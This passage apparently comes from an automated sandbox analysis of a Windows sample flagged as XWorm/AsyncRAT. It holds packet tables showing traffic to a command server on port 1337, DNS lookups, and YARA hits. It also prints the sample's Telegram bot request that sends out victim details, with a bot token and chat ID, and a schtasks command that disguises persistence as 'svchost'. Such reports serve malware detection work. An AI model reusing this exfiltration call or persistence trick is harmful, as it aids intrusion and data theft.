                                                Nov 23, 2024 21:06:14.855412960 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:14.982116938 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:15.030333042 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:15.072501898 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:15.072864056 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:15.192837000 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:19.752314091 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:19.924737930 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:20.167924881 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:20.174351931 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:20.293939114 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:24.764528990 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:24.884166956 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:24.936506033 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:25.060439110 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.060731888 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:25.137383938 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.180937052 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.181200027 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:25.302761078 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.347307920 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.360656023 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:25.494723082 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.513261080 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:25.519506931 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:25.710274935 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.296180964 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:30.422569990 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.422627926 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:30.542150021 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.542195082 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:30.661890030 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.676426888 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.678922892 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:30.846009016 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.898170948 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:30.925271988 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:31.032166004 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:31.034909010 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:31.048316956 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:31.054378033 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:31.161263943 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:31.180864096 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:35.112652063 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:35.174346924 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:40.670841932 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:40.791596889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:40.791656017 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:40.911462069 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:40.911513090 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.032097101 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.032160997 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.039460897 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.092339039 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.198108912 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.198234081 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.242760897 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.298379898 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.322329998 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.322489023 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.367224932 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.420546055 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.442017078 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.442373991 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.453248024 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.498711109 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.533617973 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.533916950 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.577524900 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.577615023 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.697247982 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:41.697319031 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:41.858051062 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:45.781008005 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:06:45.900892973 CET8049730208.95.112.1192.168.2.4
                                                Nov 23, 2024 21:06:51.282501936 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:51.408881903 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:51.410451889 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:51.530018091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:51.654772997 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:51.658601046 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:51.779151917 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:51.865118027 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:51.868469000 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:51.994884014 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:52.249034882 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:52.368666887 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:52.611372948 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:52.613189936 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:52.732721090 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:04.518707991 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:04.638402939 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:04.881337881 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:04.886631012 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:05.012028933 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:05.114900112 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:05.170486927 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:06.155572891 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:06.279836893 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:06.522644997 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:06.524878979 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:06.644464970 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:08.608445883 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:08.728039026 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:08.971164942 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:08.973094940 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:09.097450972 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:20.874034882 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:20.993659973 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:21.272547007 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:21.275253057 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:21.397304058 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:25.983408928 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:26.109896898 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:26.352999926 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:26.355168104 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:26.474834919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:28.593097925 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:28.714664936 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:28.957629919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:28.959846020 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:29.080022097 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:29.906492949 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:30.131342888 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:30.374088049 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:30.376163960 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:30.496695995 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:35.152096033 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:35.204523087 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:35.220808983 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:35.340779066 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:35.583856106 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:35.592876911 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:35.719506025 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:44.280854940 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:44.400655985 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:44.662640095 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:44.665162086 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:44.785247087 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:47.546210051 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:47.668065071 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:47.910780907 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:47.913494110 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:48.032965899 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:48.405313969 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:48.528666019 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:48.808516026 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:48.810714960 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:48.930565119 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.108582020 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.228528976 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.228652000 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.349307060 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.471230984 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.473794937 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.599658966 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.599739075 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.681655884 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.719927073 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.720041990 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:55.839534044 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.962842941 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:07:55.964678049 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:07:56.085235119 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:03.766635895 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:03.912961006 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:04.155869007 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:04.165771961 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:04.286663055 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:05.095467091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:05.139522076 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.312210083 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.432300091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.432358027 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.554282904 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.554339886 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.675479889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.680387020 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.717612982 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.729947090 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:06.854443073 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.893836975 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:06.899210930 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.064845085 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.064908981 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.376030922 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.419467926 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.419586897 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:07.496232033 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:07.596801996 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:16.718555927 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:16.881069899 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:17.083525896 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:17.086071968 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:17.255260944 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.186995983 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.480506897 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.610685110 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.724237919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.730190992 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.730953932 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:27.850725889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.973037004 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:27.975903034 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.098886967 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.381328106 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.501120090 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.743923903 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:28.746439934 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:28.878722906 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:35.150293112 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:35.202054977 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.361479998 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.482907057 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:37.728440046 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:37.730791092 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:37.852983952 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.593313932 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:42.714163065 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.714314938 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:42.834227085 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.957032919 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:42.958983898 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.086577892 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.167869091 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.203568935 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.325335026 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:43.325613022 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:43.445072889 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:47.780561924 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:47.901140928 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:48.144468069 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:48.149101019 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:48.272279978 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:52.827641964 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:52.947546959 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:53.227047920 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:53.229055882 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:53.348989964 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.532789946 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.652384996 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.859863997 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.895370960 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.936532021 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:57.984184027 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:57.984436035 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:58.109973907 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:58.227147102 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:08:58.231872082 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:08:58.351387024 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.280719995 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:04.422152042 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.665318966 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:04.667439938 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:04.789544106 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:05.094644070 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:05.139681101 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.405713081 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.532107115 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:06.781238079 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:06.782274008 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:06.902178049 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:18.686984062 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:18.811279058 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:19.091409922 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:09:19.092806101 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:09:19.212465048 CET133749732104.198.168.179192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 23, 2024 21:05:04.352222919 CET6254553192.168.2.41.1.1.1
                                                Nov 23, 2024 21:05:04.495640039 CET53625451.1.1.1192.168.2.4
                                                Nov 23, 2024 21:05:07.277539015 CET5048353192.168.2.41.1.1.1
                                                Nov 23, 2024 21:05:07.422281981 CET53504831.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 23, 2024 21:05:04.352222919 CET192.168.2.41.1.1.10x5e9fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Nov 23, 2024 21:05:07.277539015 CET192.168.2.41.1.1.10xaf94Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 23, 2024 21:05:04.495640039 CET1.1.1.1192.168.2.40x5e9fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Nov 23, 2024 21:05:07.422281981 CET1.1.1.1192.168.2.40xaf94No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • api.telegram.org
                                                • ip-api.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730208.95.112.1806880C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 23, 2024 21:05:04.624641895 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Nov 23, 2024 21:05:05.768939972 CET175INHTTP/1.1 200 OK
                                                Date: Sat, 23 Nov 2024 20:05:05 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449731149.154.167.2204436880C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-23 20:05:08 UTC429OUTGET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-11-23 20:05:09 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Sat, 23 Nov 2024 20:05:09 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-11-23 20:05:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:15:04:59
                                                Start date:23/11/2024
                                                Path:C:\Users\user\Desktop\WV7Gj9lJ7W.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
                                                Imagebase:0xc00000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:1
                                                Start time:15:05:05
                                                Start date:23/11/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:15:05:05
                                                Start date:23/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
